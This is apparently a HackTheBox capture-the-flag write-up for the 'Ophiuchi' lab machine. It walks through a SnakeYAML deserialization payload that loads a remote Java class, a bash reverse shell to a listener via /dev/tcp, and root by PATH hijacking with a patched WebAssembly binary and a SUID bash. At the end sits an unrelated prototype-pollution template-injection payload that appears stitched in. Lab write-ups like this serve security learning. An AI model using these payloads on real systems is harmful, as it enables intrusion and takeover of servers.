CTF-Writeups/HackTheBox/Ophiuchi.md
2021-04-23 08:58:56 +05:00

7.8 KiB

HackTheBox-Ophiuchi

Rustscan


rustscan -a 10.10.10.227 -- -A -sC -sV             
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy           :
: https://github.com/RustScan/RustScan :
 --------------------------------------
Please contribute more quotes to our GitHub https://github.com/rustscan/rustscan

Open 10.10.10.227:22
Open 10.10.10.227:8080

PORT     STATE SERVICE REASON         VERSION                                                                     
22/tcp   open  ssh     syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)                
8080/tcp open  http    syn-ack ttl 63 Apache Tomcat 9.0.38
| http-methods:                                          
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Parse YAML

PORT 8080 (HTTP)

There's a YAML parser so I tried to write something there but got no response

From the nmap scan we already know that Apache Tomcat 9.0.38 is running ,so I logging in by going to /manager ,but wasn't able to login using the default credentials

So after googling for apache tomcat 9.0.38 vulnerabilites/exploits I found snake yaml deserilization exploit

The exploit is about Snake YAML having a feature to call a java class constructor

!!javax.script.ScriptEngineManager [
  !!java.net.URLClassLoader [[
    !!java.net.URL ["http://VPN_IP/"]
  ]]
]

We'll see a request being made for /METAINF/services/javax.script.ScriptEngineFactory on our machine

We can abuse it in a way that keeping the same file structure like having directory 'META-IN' then a sub directory services having a file name javax.script.ScriptEngineFactory and in that file we will call our exploit

Create a file name exploit.java you can get the java code from here and in that we'll try to ping our local machine to see if the exploit works or not so that we can get a reverse shell

https://github.com/artsploit/yaml-payload/blob/master/src/artsploit/AwesomeScriptEngineFactory.java

Compile the java file using javac and you will get .class file

In the javax.script.ScriptEngineFactory we will include this content

And also we will make a folder snakeyml having that exlpoit.class file

So the file structure will look like this , so start the python3 server or apache2 to host the folder and use the same java class constructor we were calling yaml

After sending it we receive a 500 error

We can see the error that we compiled the java file with the latest version of javac so we need to comiple it using the java class 55 version. We can do this by specifying the release as a paramter in javac. (Thank you stackoverflow)

Now compiling it using the release version 11 and start both the python3 web server and start listening for ICMP packets on tun0 interface

On giving java constructor class in yaml we will see the ICMP packets

But there was a problem in getting a reverse shell no matter which reverse shell I tried to use whether it was a bash or netcat I couldn't get a shell so I made a script which had a bash reverse shell

#!/bin/bash
bash -i >& /dev/tcp/10.10.14.196/4242 0>&1

Now we will download the bash script on the target machine using wget save it in /tmp directory and will execute it using bash also we will setup a netcat listener. So modifying our exploit.java file

Enter this in yaml parser input box

Once you enter this on your terminal you'll see the request being made to get exploit.sh and you will get a reverse shell

Stabilizing the shell using python3

Since apache tomcat is running we can now search for users file

Now using find command to search for that file

We can try to switch user as admin with that password on the machine

Reading the source code we can see that it's going to read the Web assembly binary then it's going to get a value from info function and if that value it's not equal to 1 the program will give the ouput "Not ready to deploy" else it would execute a deploy.sh script.

There is one thing to note that main.wasm and deploy.sh don't have the absolute path in the source meaning we can make our own files and then play around with the PATH variable. So first I am going to download main.wasm on to my machine

https://github.com/WebAssembly/wabt

And here will be using a tool named WABT Web Assembly Binary Toolkit , we need to convert the main.wasm file to .wat file as it is a text format to that binary. But before that first let's see the info function in the binary using wasm-decompile which will decompile the binary to C syntax

We can see that info function returns the value 0 so that's what we need to change. Converting .wasm to .wat file

On opening the .wat file we can see that const value is 0

So remeber the source code had a condition if f!=1 (if f is not equal to 1) it's going to print not deploy else it will execute the deploy.sh script so change that 0 to 1

Now we need that back in binary form (.wasm) so we are going to convert it from .wat to .wasm

Transfer this onto target machine in /tmp directory also to make a deploy.sh file. I added a command to make bash a SUID in that script file

Now to add /tmp to PATH variable and run the golang source code as sudo

We can see that /bin/bash now has a SUID bit on this means we can get root by running bash with -p

You can also get a reverse shell using netcat (OpenBSD)

{
"song": 
    { 
        "name":"Not Polluting with the boys" 
    }, 
    "__proto__.block": 
    {
        "type": "Text",
        "line": "'test'; return process.mainModule.constructor._load('fs').readdirSync('./', {encoding:'utf8', flag:'r'})",
        "val": "ARZ"
    } 
}